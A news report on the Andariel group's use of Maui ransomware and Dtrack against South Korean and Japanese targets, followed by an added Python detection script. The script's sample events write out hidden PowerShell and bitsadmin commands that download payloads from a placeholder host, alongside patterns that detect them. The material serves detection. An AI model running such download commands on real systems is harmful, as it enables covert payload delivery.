The Andariel APT used Maui ransomware to attack South Korea

August 23, 2022
Tags: Andariel APT, Maui Ransomware, South Korea, North Korean Hackers, Hacking Group, Financial Malware

Researchers have linked the North Korean Andariel APT group to the Maui ransomware operation after observing the group's financially motivated and espionage campaigns against South Korea.

According to the researchers, the Andariel group used the same tactics, techniques, and procedures (TTPs) employed in the Maui ransomware attacks. The link was established when Andariel's recent attack was found to overlap with the ransomware's earlier activity.

The study showed that, after the initial infection, the operators used legitimate proxy and tunnelling tools to maintain access to the compromised target. Moreover, both Andariel and the Maui operation used PowerShell scripts with Bitsadmin to download additional payloads.

Researchers also observed the North Korean hackers making the same use of exploits against known but still unpatched flaws in public-facing services.

Andariel APT focused on launching the Dtrack malware against their victims’ networks.

In its recent activity, Andariel focused on deploying the Dtrack malware and remained dormant for months inside a victim’s network before taking any further action. The group has also launched ransomware worldwide, showing a focus on financial gain.

The FBI has also issued several warnings about Maui ransomware and published indications that North Korean threat actors are involved.

Andariel APT also attacked a Japanese entity with Dtrack malware before encrypting its data. Log analysis of that attack revealed the presence and use of a 3Proxy kit in the affected firm’s network months before the encryption.

Dtrack is a modular malware used for data theft and HTTP exfiltration by way of Windows commands. 3Proxy, on the other hand, is an open-source proxy server utility that has been used in several Andariel operations.

The attackers then deploy Maui ransomware to encrypt servers in healthcare services, such as diagnostic, imaging, intranet and health-record servers.

Given the Andariel threat group’s affiliation with Maui ransomware, defenders should use the IoCs published by the authorities, since these significantly aid real-time detection and prevention.

Organisations should also use threat intelligence services to identify these TTPs promptly and get guidance on the most effective response.
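As an added illustration of how the TTPs and IoCs described above translate into detection logic, the following Python script is not from the researchers or the article; it scans Windows process-creation telemetry (Sysmon Event ID 1 style fields, an assumption) for the tradecraft the report names: BITSAdmin downloads spawned from PowerShell, execution of the 3Proxy tool, and file hashes matching an IoC list. The IoC values and the events are constructed placeholders, not indicators from the official advisories; substitute the published hashes when you run it against real logs.

```python
"""Hunt for the Andariel / Maui tradecraft described in the article in process-creation logs.

Everything below is constructed sample data: the IoC hashes are placeholders and the
events are made up. Replace IOC_SHA256 with the hashes from the official advisory.
"""
import re
from dataclasses import dataclass

# Constructed placeholder IoC set (not real indicators).
IOC_SHA256 = {
    "PLACEHOLDER-MAUI-SHA256-0001",
    "PLACEHOLDER-DTRACK-SHA256-0002",
}

# Legitimate proxy tooling the report says was abused; extend from your own threat intel.
PROXY_TOOL_IMAGES = {"3proxy.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# bitsadmin /transfer <job> ... <URL> <localpath>: a download job, as opposed to /list etc.
BITS_TRANSFER_RE = re.compile(r"/transfer\b.*https?://", re.IGNORECASE)
# The PowerShell cmdlet equivalent of the same download behaviour.
START_BITS_RE = re.compile(r"Start-BitsTransfer", re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Minimal view of a Sysmon Event ID 1 (process creation) record (assumed field names)."""
    record_id: int
    image: str
    parent_image: str
    command_line: str
    sha256: str = ""


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event: ProcessEvent) -> list:
    """Return the names of every rule the event trips (empty list if none)."""
    hits = []
    image, parent = _basename(event.image), _basename(event.parent_image)

    # High-confidence: hash of the launched binary is on the IoC list.
    if event.sha256 and event.sha256 in IOC_SHA256:
        hits.append("ioc_hash_match")

    # TTP: PowerShell driving bitsadmin to fetch a payload over HTTP(S).
    if (image == "bitsadmin.exe" and parent in POWERSHELL_IMAGES
            and BITS_TRANSFER_RE.search(event.command_line)):
        hits.append("powershell_bitsadmin_download")

    # TTP: same behaviour expressed through the BITS cmdlet inside PowerShell itself.
    if image in POWERSHELL_IMAGES and START_BITS_RE.search(event.command_line):
        hits.append("powershell_bits_cmdlet_download")

    # TTP: proxy / tunnelling tool running on an endpoint where it has no business.
    if image in PROXY_TOOL_IMAGES:
        hits.append("proxy_tool_execution")

    return hits


def scan(events) -> dict:
    """Map record_id -> list of rule names for every event that produced at least one hit."""
    findings = {}
    for event in events:
        hits = detect(event)
        if hits:
            findings[event.record_id] = hits
    return findings


# Constructed sample telemetry (198.51.100.0/24 is a documentation range, not a real C2).
SAMPLE_EVENTS = [
    ProcessEvent(1, r"C:\Windows\System32\bitsadmin.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"bitsadmin /transfer job1 /download /priority high http://198.51.100.7/update.dat C:\Windows\Temp\u.dat"),
    ProcessEvent(2, r"C:\Windows\System32\bitsadmin.exe", r"C:\Windows\System32\cmd.exe",
                 "bitsadmin /list /allusers"),  # benign administrative use
    ProcessEvent(3, r"C:\ProgramData\svc\3proxy.exe", r"C:\Windows\System32\services.exe",
                 r"3proxy.exe C:\ProgramData\svc\3proxy.cfg", sha256="PLACEHOLDER-DTRACK-SHA256-0002"),
    ProcessEvent(4, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
                 r"powershell.exe -nop -w hidden -c Start-BitsTransfer -Source http://198.51.100.7/x.dat -Destination C:\Windows\Temp\x.dat"),
    ProcessEvent(5, r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Windows\explorer.exe",
                 "chrome.exe --profile-directory=Default"),
]

if __name__ == "__main__":
    for record_id, rules in scan(SAMPLE_EVENTS).items():
        print(f"record {record_id}: {', '.join(rules)}")
```

The hash rule is the only one that needs the published IoCs; the three behavioural rules keep firing after the actors rotate binaries, which is why the article's advice to track TTPs as well as IoCs matters. Tune the parent-process and tool-name sets to your own environment before alerting on them.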
